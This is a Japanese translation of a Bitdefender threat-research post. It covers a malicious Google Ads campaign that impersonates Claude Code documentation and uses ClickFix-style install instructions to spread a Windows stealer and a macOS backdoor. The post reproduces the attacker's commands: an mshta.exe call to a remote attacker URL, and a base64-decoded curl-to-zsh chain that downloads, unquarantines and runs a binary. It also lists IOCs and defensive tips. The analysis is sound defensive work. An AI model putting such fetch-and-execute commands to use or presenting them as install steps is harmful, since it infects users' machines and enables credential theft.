Bitdefender のセキュリティ研究者が、Anthropic が開発した大規模言語モデル Claude に関連するダウンロードを探している人々を標的とした悪意のある Google 広告キャンペーンを発見しました。
重要なポイント
- 悪意のある Google 広告が Claude Code になりすまし。
- 偽のサイトは公式の Claude Code ドキュメントをミラーリング。
- Windows ユーザーが mshta.exe 経由でマルウェアを実行。
- macOS ユーザーが難読化されたシェルコマンド経由で Mach-O バックドアをダウンロード。
- Bitdefender は Windows ペイロードを Trojan.Stealer.GJ、Trojan.Stealer.GK、IL:Trojan.MSILZilla.245316、および Gen:Variant.Barys.509034 として検出
- 攻撃者はおそらくマレーシアの企業に関連する侵害された広告主アカウントを悪用。
- 偽のドキュメントページは Squarespace サブドメイン上でホストされていました。
Claude はしばらくの間ニュースで報道されており、サイバー犯罪者はこの LLM に関連するツールとダウンロードを検索する人々を予測することで利益を得ています。
この関心を悪用するため、彼らは正当な検索結果の上に表示される説得力のあるスポンサー結果を購入し、被害者を実際のサイトに似た偽のドキュメントページにリダイレクトしました。
さらに、攻撃者はデバイスを侵害するための最も基本的な戦術の 1 つを使用しています。それは ClickFix と呼ばれる方法で、ユーザーが実際に Windows または macOS システムにマルウェアをインストールするターミナルコマンドを実行するようにだまします。このキャンペーンは、PushSecurity の同僚の研究者によっても記録されています。
このアタックの仕組み
まず、攻撃者は「download claude code」などのようなものをユーザーが検索したときに表示される Google 広告を購入します。広告は実際のように見え、公式ブランドをコピーしています。Google がそれをスポンサー結果としてマークしているため、ユーザーはそれが検証に合格したと思い込む傾向があります。
次に、広告は Squarespace サブドメイン上でホストされている偽のドキュメントページにユーザーをリダイレクトします。ページは実際の Claude Code Docs のレイアウト、ナビゲーション構造、およびスタイルをコピーしています。
何も疑わしい、または不自然には見えません。すぐには一致しない唯一の要素は URL ですが、誰もが URL を二重確認するわけではありません。たとえそうしても、彼らはよく知られている Squarespace を見ます。
第 3 に、ページは訪問者のオペレーティングシステムに応じて変更されるインストール手順を提示します。たとえば、Windows ユーザーは、実際の Microsoft ユーティリティである mshta.exe を活用して、リモートペイロードをダウンロードして実行するコマンドを表示します。
一方、macOS ユーザーは、Base64 エンコードされたコンテンツをデコードし、多段階の感染チェーンをトリガーするより複雑なターミナルコマンドに遭遇します。
第 4 に、被害者がコマンドを実行すると、マルウェアは攻撃者が管理するインフラストラクチャからセカンダリペイロードを取得します。Windows では、ペイロードには Trojan.Stealer.GJ および Trojan.Stealer.GK として検出されるスティーラーが含まれます。
macOS では、ダウンロードされた Mach-O バイナリは、/bin/bash または /bin/zsh を生成でき、リモートコマンド実行を有効にするバックドアをインストールします。
これが危険な理由は、攻撃者がソフトウェアの欠陥を決して悪用しないためです。感染全体は、被害者の指示に従う意思と ClickFix ソーシャルエンジニアリング戦術に引っかかる傾向に依存しています。
欺瞞的な Claude 広告
ユーザーはこのようなものを検索します:

Google がそれをスポンサー結果としてラベル付けし、ブランディングが本物に見えたため、ユーザーはそれを信頼する傾向があります。
Claude の正当なドキュメントにたどり着く代わりに、彼らはこのページに到達しました:

ページは以下でホストされている実際のドキュメントをほぼ完璧にミラーリングしました:
https://docs.claude.com/docs/en/overview
ドキュメントからマルウェア実行へ
偽のページは、macOS および Windows 用のターミナルコマンドを使用して Claude Code をインストールするよう人々に指示しました。開発者ツールに慣れた誰もが、躊躇することなくそれらをコピーして実行するようにだまされる可能性があります。
その瞬間が感染チェーンをトリガーしました。
Windows ユーザーは PowerShell でこれを実行するよう指示を受けました:
C:\Windows\SysWOW64\mshta.exe https://download.active-version[.]com/claude
または Windows CMD:
C:\Windows\SysWOW64\mshta.exe https://download.active-version[.]com/claude
このコマンドは、HTML アプリケーション(HTA ファイル)を実行するために設計された正当な Microsoft ユーティリティである mshta.exe を悪用しています。
実行されると、システムは実行可能コンポーネントと HTA ファイルを含むペイロードをダウンロードしました。
Bitdefender はこれらの脅威を以下として検出します:
- Trojan.Stealer.GJ
- Trojan.Stealer.GK
HTA ファイルは、最後の段階でシェルコードになるメモリに埋め込まれた Microsoft 中間言語(MSIL)ペイロードを再帰的にデコードします。
HTA によって実行される MSIL ステージャーは、別のカップルのトロイの木馬として検出されます:
- IL:Trojan.MSILZilla.245316
- Gen:Variant.Barys.509034
macOS ユーザーに何が起こるか
macOS ユーザーは、より複雑で意図的に難読化された別のコマンドを表示します。
攻撃者は被害者に次のコマンドを実行するよう説得します:
echo "macOS Download: http://code.claude[.]ai/download/" && curl -sSfL $(echo ' <BASE_64_PAYLOAD> '|base64 -D)| zsh
このコマンドは Base64 エンコードされた文字列をデコードし、デコードされた出力を zsh に直接パイプします。
第 2 段階がすぐに開始されます。
#!/bin/zsh
tnyrzi=$(base64 -D <<'PAYLOAD_END' | gunzip
<BASE_64_PAYLOAD> PAYLOAD_END
)
eval "$tnyrzi"
スクリプトは埋め込まれたコンテンツをデコードして解凍し、それを実行します。
デコードされたコマンドは以下を読み込みます:
#!/bin/zsh
curl -o /tmp/helper https://wriconsult[.]com/n8n/update && xattr -c /tmp/helper && chmod +x /tmp/helper && /tmp/helper
システムは以下から Mach-O バイナリを取得します:
https://wriconsult[.]com/n8n/update
スクリプトは拡張属性を削除し、実行権を付与し、バイナリを起動します。
インストーラーは表示されず、ユーザーに警告するプロンプトもありません。マルウェアはサイレントに実行されます。
macOS マルウェアは、資格情報、ブラウザデータ、および暗号関連情報を収集できる既知の macOS 情報スティーラーである AMOS スティーラーのような Anti-Sandbox/anti-VM チェックを実行します。
macOS バックドア内部
ユニバーサル Mach-O バイナリの分析は、それがバックドアまたはリバースシェルのように機能することを示しています。
バイナリ:
- バイナリが読み込まれるとすぐに悪意のあるコードが自動的に実行されるように、グローバルコンストラクタ(mod_init_func)を使用します。
- バイナリは、文字列の難読化を通じてその主な目的を隠します。
- ペイロードと実際の目的の両方を隠すために、デコード ルーチン(sub_10005d330 や sub_100053970 など)に依存しています。
- 特に、関数 sub_100000730(arm64 の場合)および sub_100000700(x86_64 の場合)はシェルの実行を担当しています。入出力ストリームをリダイレクトしながら、fork、pipe、dup2、および execl を使用して /bin/bash または /bin/zsh を起動します。
- sub_100000730 (arm64)
- sub_100000700 (x86_64)
- マルウェアは、実際の機能を隠すために算術ベースのデコード ループに大きく依存しています。
- また、シェルセッションの起動を自動化し、攻撃者が感染したマシンをリモートで制御できるようにします。
これらすべての動作は、マルウェアが攻撃者によるリモートアクセスと制御を可能にするために構築されたという強い兆候です。
広告主アカウント接続
予想できるように、Google は誰もがあらゆる種類の広告を投稿できるようにはしていません。通常、スクラティニーがあります。したがって、攻撃者は既にこのタイプの信頼を持っていた会社アカウントを使用する必要がありました。
当社の分析により、このキャンペーンは実際のマレーシアの企業に関連付けられています。攻撃者がこの広告主のアカウントを侵害して悪意のある広告を公開したと考えられます。その後、広告主のアカウントは Google によって無効化されました。
IOCs
- 79cd21185c51a5bfe2cfebdc51e14b258d91549fc0e4e09b6939c2a8a1c5ac19
- 3b4d3a59024f14cf1f07395afd6957be05d125e00ae8fdcea3a5dee1d8ab9dd3
- eb4d9a0e4c483dc29ae8c4d31fafcd583c457923d3344745b5c7ab13abed4dc5
- 505b32ac2b6fffb5fac81d5bdc2e1e8581fc4196dfb01aee852216a3ad6ff47e
- 762fb099115d1917b6f673cc5c74a4b61962a64d640673aaf02566ca6a3dbfa4
- a78e487995ab452c5990b4baff6a4fa485ae2798c2ddd13718c17eb641f11646
- hxxps://claude-code-cmd.squarespace[.]com
- hxxp://code.claude[.]ai/download/
- hxxps://download.active-version[.]com/claude
身を守る方法
- ソフトウェアダウンロードのスポンサー結果を避ける
- ドメインを注意深く確認する
- 本当に何をしているのか知らない限り、インストール方法としてコマンドを実行しないでください
- これらの試みをブロックできる Total Security などの包括的なセキュリティソリューションを使用してください
FAQ
Claude Code は悪意がありますか?
いいえ。攻撃者はブランドになりすまされました。正当なソフトウェアは安全なままです。
これは Windows と macOS の両方に影響しますか?
はい。キャンペーンは各プラットフォーム用にカスタマイズされたマルウェアを展開します。
macOS マルウェアは何をしますか?
リモートシェルを生成し、攻撃者が管理するコマンドを実行できるバックドアをインストールします。
Google は悪意のある広告を表示した理由は何ですか?
攻撃者がおそらく正当な広告主アカウントを侵害し、キャンペーンがレビューシステムを通過できるようにしました。
翻訳元: https://www.bitdefender.com/en-us/blog/labs/fake-claude-code-google-ads-malware